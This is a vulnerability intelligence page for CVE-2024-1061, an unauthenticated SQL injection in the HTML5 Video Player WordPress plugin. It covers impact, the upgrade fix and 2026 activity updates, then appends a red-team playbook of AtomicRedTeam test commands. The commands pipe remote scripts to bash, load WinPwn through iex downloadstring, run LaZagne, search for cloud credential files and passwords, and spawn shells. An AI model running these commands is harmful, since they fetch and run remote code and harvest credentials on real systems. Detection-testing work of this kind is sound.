CVE-2024-1061
Overview
This vulnerability is an unauthenticated SQL injection affecting the 'id' parameter within the 'get_view' function of the HTML5 Video Player WordPress plugin. The root cause lies in improper input validation and sanitization of the 'id' parameter, allowing direct injection of malicious SQL code. The flaw resides specifically in the plugin's database query handling mechanism that processes user-supplied input without adequate filtering.
Vulnerability Description
The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the 'get_view' function.
Impact
An attacker can exploit this vulnerability remotely without authentication to execute arbitrary SQL queries on the WordPress site's database. This can lead to unauthorized data disclosure, modification, or corruption of database records. Given the network attack vector (AV:N) and no required privileges (PR:N), exploitation is straightforward and can compromise the confidentiality and integrity of sensitive information stored by the plugin or WordPress instance. The vulnerability does not require user interaction (UI:N) and affects the entire security scope (S:C).
Solution
Users should upgrade the HTML5 Video Player WordPress plugin to version 2.5.25 or later, as detailed in the Tenable advisory (https://www.tenable.com/security/research/tra-2024-02). This update includes proper input validation and parameterized queries to mitigate the SQL injection. No additional workarounds are documented; applying the vendor-provided patch is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the HTML5 Video Player WordPress Plugin, specifically in versions prior to 2.5.25, is characterized by an unauthenticated SQL injection flaw within the 'get_view' function. This vulnerability arises from improper handling of user input, particularly the 'id' parameter, which allows attackers to manipulate SQL queries executed by the application. When an attacker sends a specially crafted request containing malicious SQL code, they can gain unauthorized access to the database. This can lead to the extraction of sensitive information, modification of data, or even complete control over the database, depending on the privileges of the database user.
Exploitation of this vulnerability can occur through various attack vectors. Since the SQL injection is unauthenticated, an attacker does not need to be logged into the WordPress site to initiate an attack. This significantly lowers the barrier for exploitation, as any unauthenticated user can target the affected plugin. A common scenario involves sending a crafted HTTP request to the vulnerable endpoint, which could be done using automated tools or scripts designed to probe for SQL injection vulnerabilities. Once the attacker successfully injects SQL commands, they can execute arbitrary SQL queries, potentially leading to the retrieval of user credentials, administrative data, or other sensitive information stored in the database.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on the HTML5 Video Player Plugin for their WordPress sites. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to significant data breaches. Such breaches can result in financial losses, reputational damage, and legal repercussions, particularly if sensitive user data is compromised. Additionally, the presence of this vulnerability in a widely used plugin increases the likelihood of mass exploitation, as attackers often target popular plugins to maximize their impact. Organizations may face increased scrutiny from stakeholders and regulatory bodies, further amplifying the business risks associated with this vulnerability.
To detect and mitigate the risks associated with this SQL injection vulnerability, organizations should implement a multi-faceted approach. Regularly updating the HTML5 Video Player Plugin to the latest version is crucial, as this will patch the vulnerability and reduce exposure. Furthermore, employing web application firewalls (WAF) can help filter out malicious traffic and block SQL injection attempts before they reach the application. Additionally, conducting regular security assessments, including vulnerability scanning and penetration testing, can help identify and remediate potential weaknesses in the application. Educating developers about secure coding practices and input validation techniques is also essential to prevent similar vulnerabilities from being introduced in the future.
In conclusion, the unauthenticated SQL injection vulnerability in the HTML5 Video Player WordPress Plugin poses a significant threat to organizations utilizing this software. The ease of exploitation, coupled with the potential for severe consequences, underscores the importance of proactive security measures. By staying informed about vulnerabilities, applying timely updates, and implementing robust security practices, organizations can better protect themselves against the risks associated with this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-1061, indicating increased probing or exploitation attempts targeting the unauthenticated SQL injection vulnerability in the HTML5 Video Player WordPress Plugin. Despite this surge, the EPSS score has significantly declined, reflecting a reduced likelihood of widespread exploitation in the near term. This divergence suggests that while adversaries are actively scanning or testing for the vulnerability, large-scale or automated exploitation campaigns have not materialized. For defenders, this nuanced shift underscores the importance of maintaining vigilance without overestimating immediate risk; the vulnerability remains critical, but current exploitation dynamics appear constrained. Consequently, the overall threat level should be viewed as elevated due to increased adversary interest, yet tempered by the decreasing probability of successful exploitation events as indicated by the EPSS trend.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a modest uptick in activity related to CVE-2024-1061, indicating a growing adversary interest in probing the 'HTML5 Video Player' WordPress plugin for potential exploitation opportunities. While no new exploit variants or automated campaigns have been identified, the slight increase in telemetry and the incremental rise in the EPSS score suggest that threat actors are intensifying reconnaissance efforts. This subtle shift is significant because it may precede more aggressive exploitation attempts, especially given the vulnerability’s critical severity and unauthenticated attack vector. For defenders, this evolving landscape underscores the necessity of heightened monitoring and proactive detection capabilities to identify early indicators of exploitation. The overall threat level should be considered moderately elevated; although large-scale exploitation remains absent, the increased adversary activity signals a potential escalation in risk that warrants continued vigilance.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Bplugins | Html5 Video Player | All |
cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-1061 |
| tenable.com |
GitHub CVE
|
https://www.tenable.com/security/research/tra-2024-02 |